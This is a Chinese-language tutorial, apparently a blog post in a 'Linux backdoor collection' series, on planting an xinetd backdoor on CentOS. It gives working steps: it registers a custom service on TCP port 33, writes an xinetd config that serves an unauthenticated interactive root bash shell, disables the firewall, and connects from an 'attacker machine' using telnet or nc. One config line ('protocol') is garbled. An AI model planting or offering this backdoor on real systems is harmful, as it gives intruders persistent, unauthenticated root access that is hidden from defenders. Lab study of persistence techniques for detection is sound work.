Linux后门大全-xinetd后门(二)

环境

靶机:centos7.6

攻击机:Linux

使用docker搭建靶机环境,当然也可以不使用docker,直接跳过创建容器的步骤即可

创建容器

bash 复制代码
#创建名为backdoorT4的特权容器,并使用/usr/sbin/init,因为容器默认不开启system服务,所以得使用特权容器开启,不然后续无法使用systemctl命令
docker run -itd --name backdoorT4 --privileged=true centos:7.6.1810 /usr/sbin/init
# 检查容器创建结果
docker ps -a|grep "backdoorT4"
#进入容器
docker exec -it backdoorT4 /bin/bash

安装xinetd

bash 复制代码
#在容器内执行:
yum install xinetd -y
#也可以安装firewalld,后续可以使用这个关闭防火墙,或者使用iptables
yum install firewalld -y

修改配置并启动

  • 首先需要自定义一个服务并绑定
bash 复制代码
#自定义一个名为testcn的服务,绑定端口为33,协议tcp,当然你也可以自定义其他名字和端口,切勿与现有的重复
echo "testcn          33/tcp" >> /etc/services
#检查添加结果
cat /etc/services |grep "testcn"
  • 修改xinetd配置
bash 复制代码
#创建配置文件并添加内容
cat > /etc/xinetd.d/testcn << EOF  #根据自己定义的服务名相应的修改文件名
{
        disable         = no				#开启
        id              = testcn-stream	
        wait            = no		
        socket_type     = stream			#使用tcp,如果使用udp,修改成dgram
        protocol        =  socket type is usually enough
        user            = root
        server          = /bin/bash			#此属性为执行程序,下一个属性为其参数,合在一起的意思就是/bin/bash -i,提供一个交互式shell
        server_args     = -i
        port            = 33				#监听端口,服务绑定的是哪个就填哪个
}
EOF
#启动
systemctl start xinetd
#要使得后门生效一定要让防火墙放开相应得端口,这里的端口号是33。防火墙开放端口的命令太长不记得了,直接关闭防火墙也可以
systemctl status firewalld
#检查xinetd进程和端口33是否启动了
netstat -ltupan|grep xinetd
tcp6       0      0 :::33                   :::*                    LISTEN      5567/xinetd

连接后门

使用攻击机访问靶机的端口。有很多种方法可以连接。一般的,只要支持tcp协议的工具都能连接

bash 复制代码
#在攻击机上执行
#1.使用telnet连接
telnet  172.17.0.2 33
#连接成功后就可以执行其他命令了

#2.使用nc连接
nc -v 172.17.0.2 33

至此,此后门的使用方法您已经学会了!!!
注:如果操作系统不好安装,可以尝试使用docker安装,方便快捷。

相关推荐
杜子不疼.2 小时前
【Linux】基础IO(二):系统文件IO
linux·运维·服务器
郝学胜-神的一滴2 小时前
深入理解网络IP协议与TTL机制:从原理到实践
linux·服务器·开发语言·网络·网络协议·tcp/ip·程序人生
松涛和鸣2 小时前
DAY61 IMX6ULL UART Serial Communication Practice
linux·服务器·网络·arm开发·数据库·驱动开发
杨靳言先8 小时前
✨【运维实战】内网服务器无法联网?巧用 SSH 隧道实现反向代理访问公网资源 (Docker/PortForwarding)
服务器·docker·ssh
学习中的DGR9 小时前
[GXYCTF2019]Ping Ping Ping 1和[SUCTF 2019]EasySQL 1新手解题过程
sql·安全·web安全·网络安全·php
上海云盾商务经理杨杨9 小时前
付费网站的攻防战:2026年,如何破解并抵御爬虫攻击
网络·安全
fyakm9 小时前
K8s故障排查:常见问题定位与解决
docker·容器·kubernetes
夜勤月9 小时前
给AI装上“文件之手”:深入解析MCP文件系统服务的安全沙箱与读写实践
人工智能·安全
abcy07121310 小时前
k8s ipc-namespace进程间通信隔离类型详解
docker·容器·kubernetes
Justice link10 小时前
K8S基本配置
运维·docker·容器